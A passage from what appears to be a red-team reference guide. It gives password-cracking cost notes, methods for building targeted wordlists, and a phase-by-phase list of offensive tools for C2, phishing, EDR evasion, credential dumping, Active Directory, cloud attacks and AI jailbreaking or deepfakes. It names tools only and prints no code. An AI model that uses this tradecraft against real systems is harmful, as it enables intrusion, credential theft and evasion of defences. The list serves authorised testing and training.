Pricing: ~$0.20-0.50/hr for consumer GPUs (RTX 3090/4090) vs $2-5/hr for datacenter A100s
Strategy: Consumer GPUs offer best price/performance for most hash types; A100s for bcrypt/scrypt

CRED

Wordlist Generation & Rules

Targeted wordlist creation and organization-specific rule development

Brutas: Handcrafted targeted wordlists — built from organization-specific intelligence
Skweez: Website scraper wordlist generator — extract terms from target's web presence
WikiRaider: Wikipedia-based wordlist generation
Common patterns: Season+Year (Winter2025!), Company+Numbers (Contoso123), Keyboard walks
Iteration: Crack initial batch → analyze patterns → refine rules → crack more
Rainbow tables (NTLMv1): Google Cloud BigQuery for massive rainbow table lookups — instant cracking

// Tool Arsenal

Essential tools organized by operation phase. Not exhaustive — these are the workhorses.

Tool Reference by Phase

INFRASTRUCTURE
├── Cobalt Strike / Havoc / Sliver / Mythic            // C2 frameworks
├── Brute Ratel C4 / Nighthawk                        // Commercial adversary simulation
├── Terraform / Ansible / Nebula / Red-Baron         // IaC & infra automation
├── GoPhish / EvilGinx / evilgophish                   // Phishing & AitM platforms
├── StuntBanana / FreePBX / 3CX                        // Vishing / CID spoofing infrastructure
├── GraphStrike / ProxyBlob / Turnt / Stillepost       // Cloud-native C2 redirectors
├── teamsc2 / convoC2 / CS-EXTC2-NTP                   // Covert C2 channels
└── RedELK / Ghostwriter / VECTR                      // Red Team SIEM, reporting & tracking
INITIAL ACCESS & PAYLOADS
├── msfvenom / Donut / sRDI                            // Shellcode generation
├── Nim / Rust / C loaders                              // Custom shellcode loaders
├── Spartacus / DLLSpy / DllShimmer                    // DLL sideload & hijack weaponization
├── EPIC / Dittobytes / Crystal Palace                 // PIC builders & metamorphic compilation
├── LNKSmuggler / Mitra                                // LNK & polyglot generators
├── GraphSpy / TokenPhisher / SquarePhish             // Device code phishing
├── NachoVPN                                             // Malicious SSL-VPN server
└── QRucible / recaptcha-phish / Clickfix-Email       // Quishing & ClickFix tools
EVASION
├── SysWhispers3 / HellsGate / HalosGate              // Syscall generation
├── Ekko / Foliage / KrakenMask                       // Sleep obfuscation
├── ThreadStackSpoofer / SilentMoonwalk                 // Call stack spoofing
├── Scarecrow / Freeze                                  // Loader generation / obfuscation
├── EDRSilencer / Krueger                               // EDR network blocking / WDAC kill
├── Null-AMSI / Being-A-Good-CLR-Host                  // Advanced AMSI bypass
├── Limelighter / sgn                                   // Code signing & shellcode encoding
├── riscy-business / VMProtect                          // Malware virtualization
└── RedBackdoorer / ConfuserEx                          // PE file injection & .NET obfuscation
POST-EXPLOITATION
├── Rubeus / Certify / Certipy                         // Kerberos & ADCS
├── Snaffler / Seatbelt                                  // Discovery & credential finding
├── DonPAPI / SharpDPAPI / dploot                      // DPAPI looting
├── secretsdump.py / pypykatz                            // Credential extraction
├── nanodump / physmem2profit                           // Evasive LSASS dumping
├── ChromeKatz / cookie-monster / HackBrowserData     // Browser cookie & credential theft
├── LaZagne / goLazagne / BrowserSnatch               // All-in-one credential dumping
├── RemoteMonologue / GhostKatz                         // DCOM-based & physical memory cred extraction
├── SignalKeyBOF / WhatsAppKeyBOF                       // Messaging app key extraction
└── SCCMDecryptor-BOF                                    // SCCM credential decryption via BOF
ACTIVE DIRECTORY
├── Certipy / Certify / Locksmith                       // ADCS exploitation (ESC1-ESC15)
├── ADCSSync / DSInternals                              // DCSync alternatives
├── keycred / SharpSuccessor                            // Shadow Credentials & BadSuccessor
├── bloodyAD / godap / ldap_shell                      // LDAP operations & ACL abuse
├── BloodHound-CE / ADExplorerSnapshot                  // Attack path mapping
├── ldapx / RelayInformer                                // LDAP proxy evasion & relay assessment
├── Misconfiguration-Manager / sccmhunter               // SCCM attack tradecraft
└── SharpSphere / MemProcFS / Volumiser               // vSphere attack & memory forensics
LATERAL MOVEMENT
├── impacket suite                                       // psexec, wmiexec, smbexec, atexec, dcomexec
├── evil-winrm / bof-winrm-client                       // WinRM shell & BOF client
├── CrackMapExec / NetExec                               // Network-wide enumeration & execution
├── SharpRDP / HiddenDesktop                            // RDP execution & HVNC
├── GoExec / wmiexec-Pro / atexec-pro                   // Advanced DCOM & WMI (port 135 only)
├── SCShell / Invoke-SMBRemoting                        // Fileless service & SMB lateral movement
├── incognito / elevate_pid_bof                          // Token impersonation & process token theft
└── SweetPotato / PrintSpoofer / GodPotato             // Service account to SYSTEM escalation
CLOUD OPERATIONS
├── GraphSpy / APEX / ROADtools                        // Azure/Entra ID post-exploitation
├── CredMaster / o365spray / TeamFiltration            // M365 password spraying
├── AWSRoleJuggler / AWS-Key-Hunter                    // AWS persistence & key discovery
├── SeamlessPass / AAD BOFs                             // On-prem to cloud pivoting
└── DelePwn / CloudPEASS                               // GCP DWD abuse & cloud privesc
AI / ML OFFENSIVE
├── Claude-C2 / Drone / Nerve                          // AI-driven C2 & autonomous agents
├── GhidraMCP / IDA Pro MCP / BloodHound-MCP          // AI-assisted reverse engineering
├── LitterBox MCP / RamiGPT                             // Iterative evasion & auto-privesc
├── Deep-Live-Cam / DeepFaceLive                        // Real-time deepfake for video calls
└── Garak / PyRIT / L1B3RT4S                          // LLM red teaming & jailbreaking
LAB INFRASTRUCTURE
├── Ludus / GOAD / Exegol                              // AD lab deployment & attack distros
├── AWSGoat / CloudFoxable                              // Vulnerable cloud labs (AWS)
└── PwnedLabs / Wiz CTF                                // Cloud security training & cyber ranges